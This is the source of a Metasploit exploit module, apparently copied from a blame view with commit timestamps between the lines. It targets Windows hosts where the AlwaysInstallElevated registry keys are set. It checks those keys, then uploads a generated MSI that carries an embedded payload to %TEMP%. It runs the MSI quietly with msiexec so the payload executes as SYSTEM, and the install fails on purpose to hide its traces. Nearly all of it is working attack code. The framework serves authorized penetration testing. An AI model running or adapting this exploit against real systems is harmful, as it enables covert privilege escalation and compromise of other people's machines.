metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb

133 lines
4.3 KiB
Ruby
Raw Normal View History

2012-11-22 10:26:23 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2012-11-22 10:26:23 +00:00
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
2013-09-05 18:41:25 +00:00
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
2013-09-05 18:41:25 +00:00
include Msf::Post::File
include Msf::Post::Windows::Registry
2013-09-05 18:41:25 +00:00
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows AlwaysInstallElevated MSI',
'Description' => %q{
2013-09-29 16:22:56 +00:00
This module checks the AlwaysInstallElevated registry keys which dictates if
2013-09-05 18:41:25 +00:00
.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
2013-09-29 16:22:56 +00:00
The generated .MSI file has an embedded executable which is extracted and run
by the installer. After execution the .MSI file intentionally fails installation
(by calling some invalid VBS) to prevent it being registered on the system.
By running this with the /quiet argument the error will not be seen by the user.
2013-09-05 18:41:25 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell',
2013-09-05 18:41:25 +00:00
'Parvez Anwar' # discovery?/inspiration
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'process',
'MSI::UAC' => true
2013-09-05 18:41:25 +00:00
},
'Targets' =>
[
[ 'Windows', { } ],
],
'References' =>
[
[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
[ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
2013-09-05 18:41:25 +00:00
],
'DisclosureDate'=> 'Mar 18 2010',
'DefaultTarget' => 0
}))
register_advanced_options([
OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
], self.class)
end
def check
install_elevated = "AlwaysInstallElevated"
installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
hkcu = "HKEY_CURRENT_USER\\#{installer}"
hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
local_machine_value = registry_getvaldata(hklm,install_elevated)
if local_machine_value.nil?
vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
2013-09-05 18:41:25 +00:00
return Msf::Exploit::CheckCode::Safe
elsif local_machine_value == 0
vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
2013-09-05 18:41:25 +00:00
return Msf::Exploit::CheckCode::Safe
else
vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
2013-09-05 18:41:25 +00:00
current_user_value = registry_getvaldata(hkcu,install_elevated)
end
if current_user_value.nil?
vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
2013-09-05 18:41:25 +00:00
return Msf::Exploit::CheckCode::Safe
elsif current_user_value == 0
vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
2013-09-05 18:41:25 +00:00
return Msf::Exploit::CheckCode::Safe
else
vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
2013-09-05 18:41:25 +00:00
return Msf::Exploit::CheckCode::Vulnerable
end
end
def exploit
2013-09-29 16:22:56 +00:00
return unless check == Msf::Exploit::CheckCode::Vulnerable
2013-09-05 18:41:25 +00:00
msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
msi_source = generate_payload_msi
2013-09-05 18:41:25 +00:00
# Upload MSI
2013-09-29 16:22:56 +00:00
msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
print_status("Uploading the MSI to #{msi_destination} ...")
2013-09-05 18:41:25 +00:00
write_file(msi_destination, msi_source)
register_file_for_cleanup(msi_destination)
2013-09-05 18:41:25 +00:00
if datastore['LOG_FILE'].nil?
logging = ""
else
logging = "/l* #{datastore['LOG_FILE']} "
end
if datastore['QUIET']
quiet = "/quiet "
else
quiet = ""
end
cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"
2013-09-29 16:22:56 +00:00
print_status("Executing MSI...")
2013-09-05 18:41:25 +00:00
vprint_status("Executing: #{cmd}")
begin
result = cmd_exec(cmd)
rescue Rex::TimeoutError
vprint_status("Execution timed out.")
end
vprint_status("MSI command-line feedback: #{result}")
end
2012-11-22 10:26:23 +00:00
end